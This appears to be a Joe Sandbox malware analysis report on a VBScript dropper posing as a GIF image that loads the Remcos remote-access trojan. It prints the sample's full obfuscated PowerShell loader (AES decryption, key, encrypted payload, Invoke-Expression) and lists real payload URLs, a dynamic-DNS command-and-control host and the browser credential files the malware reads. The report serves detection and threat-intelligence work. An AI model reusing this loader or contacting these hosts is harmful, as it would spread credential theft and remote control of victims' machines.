                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni31045819173442745210226027008389cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cnigrotij99moqal/1g6m0vqbtznqapocvjw7wdfeq2dm55mrrbsdl2dtjprdivh4qro9tuowqh9vuvcwhvl7wdpldrvycvslbshkyytx3y3ec19qglil2fuyxvsxhxzrcpixvhsexgj/yljqnpmqcrbgfmq7b0x+qtytuccqp+5yobn4o6atlpw9w8pphk9ote6qu1yd4u4i80cm5mu98/pr4+8ywarzuake5pec8m1o4ku1/sjpgmlsinidtnfgago2s309dviv/fktnnaxjjczmr5wdbqltftgucrdeglc3qbcwcpmgt1xj0gl7ve4guk6hudnkbarvx6ie3asacjsl8un9o0ykkxzeyqfjy1x6z5q3ahy4xxler3uligmmxvv2bdi4uge5zccvgmzwalk6a/59+vdpw/eapul514/a+us8pix4u0jpotd/fdvcmst/nbk2n2paq0ehkxxmwpkzka1e+bupnxwxjrfwegtderivzkg4xcqmje/dz1h6bw6vof7gbpcwnfhiokyilaudebwjqtctwrqxdrxo3beibt1ie51b3ojwza1v/g2n2t89fwu55ux7+dxeif/o2omp2w4bjqawne2xjfpmi8ocuacfhimyruwu1jgqqlc20g1wdpryvchmu/6wcfwkazbxu2z+dc8hojblkiz6g02yryv03hspeacrw1wogownnx9nylir6qgyzdyysjqrzgvzx2ed0jey/v4hsh4zkwvsy3946yvczswufkgbbcphd+j/kkl82m6zpli5i+j/so2di9yy5g1lqwpa/f21tffwnalsnppwzdiwdaugc2jlgps7d7owmpgn6mz5cocsw9nz1uoebwavfax+orkq5t4pfhdwuspge1kn0mwhl53hcv2snx7vyyfspzt6nky++2xtpexo+wxcnj2u+k0vmb0gqkc/f4jauzcgmbcbllrbx1lnogrnjowqzo7twoygr6yzl5mr1kk76wixljptroolwxocba09by8f2v9p+azjutmbcghanfiiqjywdooeg0zffos+sgi2tr+sgif31xzrdk5tgul9q7whomauh7x8xesjy8ba38e/dcsfumybe7hv40jaxlgvj3rxji2pnkh2p8jplmkdconw2rmaifaywegmrghtt4k1orkvfzi3ejd4zgs2+rdvimcp4nnw8svqhy+eqiqx/8s1jdct0kgyff8i88r+i3xtrgou+2myson8qoxrya6lglkmbykehjvocpgxrcea62jbr2pobuyxqet4x+bgr9daceefuc/8bcku+6sz5tmxp6ohd/vz3jrhmzp4kn+c5qykbc0qhxnluox3at07cgywnetpccgfxkeyp13rjbbznm31t6eljuhqkbjgimzumgkiixsu8zm9izo0koxrbn8gap3xwegprlq==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8n
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2488829216.000000000126C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7n
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434C52 cpuid 4_2_00434C52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,4_2_0040F8D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00452036
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_004520C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,4_2_00452313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00448404
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0045243C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,4_2_00452543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00452610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,4_2_004488ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00451CD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00451F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,4_2_00451F9B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00404F51 GetLocalTime,CreateEventA,CreateThread,4_2_00404F51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B60D GetComputerNameExW,GetUserNameW,4_2_0041B60D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_00449190
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6048, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0040BA12
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db4_2_0040BB30

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JWJump to behavior
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6048, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe4_2_0040569A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information231
                  Scripting
                  Valid Accounts1
                  Native API
                  231
                  Scripting
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  13
                  Obfuscated Files or Information
                  111
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol111
                  Input Capture
                  2
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts22
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Remote Access Software
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  Login Hook1
                  Windows Service
                  1
                  Bypass User Account Control
                  NTDS3
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  Network Logon Script222
                  Process Injection
                  11
                  Masquerading
                  LSA Secrets33
                  System Information Discovery
                  SSHKeylogging22
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials21
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync21
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                  Process Injection
                  Proc Filesystem3
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483436 Sample: createactiveimagesbeautygir... Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 21 2024remcmon.duckdns.org 2->21 23 geoplugin.net 2->23 41 Multi AV Scanner detection for domain / URL 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 49 16 other signatures 2->49 8 wscript.exe 1 2->8         started        signatures3 47 Uses dynamic DNS services 21->47 process4 signatures5 51 VBScript performs obfuscated calls to suspicious functions 8->51 53 Suspicious powershell command line found 8->53 55 Wscript starts Powershell (via cmd or directly) 8->55 57 4 other signatures 8->57 11 powershell.exe 14 15 8->11         started        process6 dnsIp7 25 192.3.176.154, 49700, 80 AS-COLOCROSSINGUS United States 11->25 27 198.46.176.133, 49699, 80 AS-COLOCROSSINGUS United States 11->27 59 Writes to foreign memory regions 11->59 61 Suspicious execution chain found 11->61 63 Injects a PE file into a foreign processes 11->63 15 RegAsm.exe 3 13 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 29 2024remcmon.duckdns.org 192.210.214.9, 14645, 49701 AS-COLOCROSSINGUS United States 15->29 31 geoplugin.net 178.237.33.50, 49702, 80 ATOM86-ASATOM86NL Netherlands 15->31 33 Contains functionality to bypass UAC (CMSTPLUA) 15->33 35 Detected Remcos RAT 15->35 37 Contains functionalty to change the wallpaper 15->37 39 4 other signatures 15->39 signatures11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  createactiveimagesbeautygirlfrnd.gIF.vbs12%VirustotalBrowse
                  createactiveimagesbeautygirlfrnd.gIF.vbs4%ReversingLabsWin32.Dropper.Generic
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  geoplugin.net1%VirustotalBrowse
                  2024remcmon.duckdns.org14%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
                  http://schemas.m0L0%Avira URL Cloudsafe
                  http://geoplugin.net/0%Avira URL Cloudsafe
                  http://192.3.176.154/xampp/glo/KBV.txt100%Avira URL Cloudmalware
                  http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpw0%Avira URL Cloudsafe
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  http://geoplugin.net/1%VirustotalBrowse
                  http://geoplugin.net/json.gpl0%VirustotalBrowse
                  http://192.3.176.1540%Avira URL Cloudsafe
                  http://198.46.176.1330%Avira URL Cloudsafe
                  http://192.3.176.154/xampp/glo/KBV.txt1%VirustotalBrowse
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  http://198.46.176.133/Upload/vbs.jpeg19%VirustotalBrowse
                  http://geoplugin.net/json.gpw0%VirustotalBrowse
                  http://geoplugin.net/json.gpSystem320%Avira URL Cloudsafe
                  2024remcmon.duckdns.org0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpSystem321%VirustotalBrowse
                  http://192.3.176.1544%VirustotalBrowse
                  2024remcmon.duckdns.org14%VirustotalBrowse
                  http://198.46.176.13314%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  178.237.33.50
                  truefalseunknown
                  2024remcmon.duckdns.org
                  192.210.214.9
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  unknown
                  http://198.46.176.133/Upload/vbs.jpegfalse
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://192.3.176.154/xampp/glo/KBV.txtfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  2024remcmon.duckdns.orgtrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.m0Lwscript.exe, 00000000.00000003.1207989484.000001C7DAF7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208263755.000001C7DAF85000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/RegAsm.exe, 00000004.00000002.2488829216.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://geoplugin.net/json.gplRegAsm.exe, 00000004.00000002.2488829216.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://geoplugin.net/json.gpwRegAsm.exe, 00000004.00000002.2488829216.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.1264396222.00000246235C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1264396222.00000246235C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.176.154powershell.exe, 00000002.00000002.1264396222.0000024623A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://198.46.176.133powershell.exe, 00000002.00000002.1264396222.00000246237E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gpSystem32RegAsm.exe, 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  192.3.176.154
                  unknownUnited States
                  36352AS-COLOCROSSINGUSfalse
                  192.210.214.9
                  2024remcmon.duckdns.orgUnited States
                  36352AS-COLOCROSSINGUStrue
                  198.46.176.133
                  unknownUnited States
                  36352AS-COLOCROSSINGUSfalse
                  178.237.33.50
                  geoplugin.netNetherlands
                  8455ATOM86-ASATOM86NLfalse
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483436
                  Start date and time:2024-07-27 13:31:12 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 25s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:createactiveimagesbeautygirlfrnd.gIF.vbs
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winVBS@6/4@2/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 44
                  • Number of non-executed functions: 214
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  07:32:05API Interceptor38x Sleep call for process: powershell.exe modified
                  09:01:48API Interceptor1781740x Sleep call for process: RegAsm.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  192.3.176.154erthings.docGet hashmaliciousRemcosBrowse
                  • 192.3.176.154/50/HNBC.txt
                  girlfrnd.docGet hashmaliciousRemcosBrowse
                  • 192.3.176.154/xampp/glo/KBV.txt
                  DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                  • 192.3.176.154/50/HNBC.txt
                  Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                  • 192.3.176.154/xampp/glo/KBV.txt
                  192.210.214.91722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    girlfrnd.docGet hashmaliciousRemcosBrowse
                      Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                          INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                            IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                              1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                198.46.176.133creatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                erthings.docGet hashmaliciousRemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                girlfrnd.docGet hashmaliciousRemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                                • 198.46.176.133/Upload/vbs.jpeg
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
